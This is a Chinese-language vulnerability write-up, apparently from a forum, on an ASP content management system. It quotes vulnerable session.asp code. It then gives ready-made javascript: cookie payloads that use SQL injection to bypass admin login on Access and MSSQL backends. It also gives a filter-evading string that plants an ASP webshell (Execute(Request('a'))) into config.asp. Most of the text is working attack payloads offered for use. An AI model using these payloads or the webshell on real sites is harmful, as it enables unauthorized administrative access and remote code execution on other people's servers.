漏洞文件:session.asp
程序代码:
if request.cookies("CnendWeb")("admininfo_loginname")<>"" and request.cookies("CnendWeb")("admininfo_logname")<>"" then
set rs=server.createobject("adodb.recordset")
sql="select * from [admin_user] where username='"&request.cookies("CnendWeb")("admininfo_logname")&"'"
……
if rs("password")<>request.cookies("CnendWeb")("admininfo_logpassword") then
……
得到COOKIE里的用户名带入判断没有过滤.MSSQL的利用方法就很简单了.说下ACCESS的.
构造admininfo_loginname = jackal' and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin_user where '1'='1
查询出来对应的password就是4文章可以看下前面的雷驰漏洞.
简单构造下JS,IE地址栏运行,再访问后台就可以了.MSSQL会报错.TEXT和INT的类型错误.自己处理.
ACCESS:
程序代码: [ 复制代码到剪贴板 ] [ 运行代码 ]
javascript:alert(document.cookie="CnendWeb=admininfo%5Flogname=jackal%27+union+select+1%2C2%2C3%2C%274%27%2C5%2C6%2C7%2C8%2C9+from+admin%5Fuser+where+%271%27%3D%271&admininfo%5Flogpassword=4&admininfo%5Fadminclass=1&admininfo%5Floginclass=3&admininfo%5Floginname=1;")
MSSQL:
程序代码: [ 复制代码到剪贴板 ] [ 运行代码 ]
javascript:alert(document.cookie="CnendWeb=admininfo%5Flogname=jackal%27%2B%61%6E%64%2B%31%3D%40%40%76%65%72%73%69%6F%6E%2B%61%6E%64%2B%27%27%3D%27&admininfo%5Flogpassword=4&admininfo%5Fadminclass=1&admininfo%5Floginclass=3&admininfo%5Floginname=1;")
后台写WEBSHELL
逻辑错误的过滤方式:
admin_setup.asp
引用内容:
WebmasterEmail=Replace(Replace(request.form("WebmasterEmail"),"<"&"%",""),"%"&">","")
过滤掉了"<%"和"%>"
但是我们写入
test"%%>><<%%Execute(Request("a"))%%>>
过滤之后就变成了test"%><%Execute(Request("a"))%>
访问config.asp
成功得到webshell.
当前位置:
